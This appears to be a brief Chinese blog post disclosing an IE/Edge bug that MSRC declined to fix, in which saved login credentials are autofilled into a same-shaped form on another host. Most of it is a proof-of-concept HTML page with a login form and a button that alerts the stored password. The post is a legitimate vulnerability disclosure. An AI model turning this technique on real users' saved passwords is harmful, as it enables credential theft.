2016年12月

一个被认为不是安全问题的提交

提交时间:3-18
最终确认时间:4-10

MSRC: 存在问题但不严重,不修复。
影响范围:IE/EDGE

<input type="text" id="url" value="http://localhost.fbi.gov/a.htm" /><button onclick="document.getElementById('www').src=document.getElementById('url').value">Navigate</button><br/>
<iframe src="about:blank" id="www"></iframe>

<p>---------------------------------------------------------------</p>
<p>step1: put this html in http://127.0.0.1/a.htm </p>
<p>step2: fill the form below and remember the password</p>
</p>
<form action="b.htm" method="post"><input type="text" id="username" name="username"/><input type="password" id="password" name="password"/><br /><input type="submit"  name="commit" value="Log in"/></form><button onclick = "javascript:alert('stored password' + document.getElementById('password').value + ',from: ' + location.href)"> show password </button>
<p>step3: back to this page, navigate to "http://localhost.fbi.gov/a.htm" or whatever website which has same form as the code above.</p><p>
step4: user can fill the form with remembered account/password in 127.0.0.1.
</p>